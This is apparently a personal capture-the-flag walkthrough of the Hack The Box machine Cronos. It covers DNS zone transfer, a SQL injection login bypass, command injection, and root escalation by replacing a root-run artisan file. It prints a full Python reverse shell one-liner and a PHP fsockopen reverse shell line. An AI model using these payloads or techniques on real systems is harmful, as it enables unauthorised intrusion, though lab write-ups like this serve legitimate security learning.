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This is my write-up for the machine Cronos on Hack The Box located at:

nmap scan: nmap

We see three ports open. On port 80, we see the following:

I am not too familiar with DNS enumeration methods. For this reason, after I searched online for a while (and got nowhere), I then read up what I had missed from the official Hack The Box write-up for this machine. In it the author says to add cronos.htb to the /etc/hosts file. Then run the following command:

dig axfr @ cronos.htb

This will show us the following:

We see an admin.cronos.htb, so we will add that to the /etc/hosts file as well (step was mentioned in the official write-up):

Now if we go to admin.cronos.htb, we see the following:

Looking at the tags for this machine, I believe that we have to do a SQL Injection for this authentication portal:

I then opened this web page in Burp Suite to see if I can manipulate the outgoing HTTP requests. I was not able to get any where using the Intruder or Repeater modules. Reading the write-up again, it seems the SQL Injection I did try admin'-- was incorrect by a small bit. I miseed the extra " -" at the end:

screenshot from official write-up

I was then on this page:

I tried to run two commands together, the traceroute and an additional ls:

When I run cat index.php, I get the following:

To me this means that there is room for me to run a reverse netcat connection to my own machine. Netcat did not work for me but the following python command from this github page worked for me instead:

export RHOST="";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

I then upgraded by shell to a interactive tty shell (from this website):

I was able to find the user.txt flag in the user noulis's home directory:

In order to upload to the machine, I had to download it locally and serve it up in a python http server:

I was then able to grab it from the other machine using wget:

In the official write-up, something stood out to me:

Obviously, in the real world a hint like this would not be given, but since I had tried what I had known and got nowhere, I took a hint from this. This led me to finding this:

I knew that root was running the artisan file. After some messing around, what worked for me was creating a local file named artisan and copying all the contents from the original file into it. Then I edited one line in the file to get me a reverse shell:

$sock=fsockopen("",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

This was a line I got from the same GitHub page mentioned previously. After uploading the file using python3 http server, the file would upload as artisan.1:

As shown in the screenshot above, in order to go around this I just updated the file to be the one I gave it. I would recommend you run the netcat listener prior to updating the artisan file for best results. After a minute of waiting, I had the shell: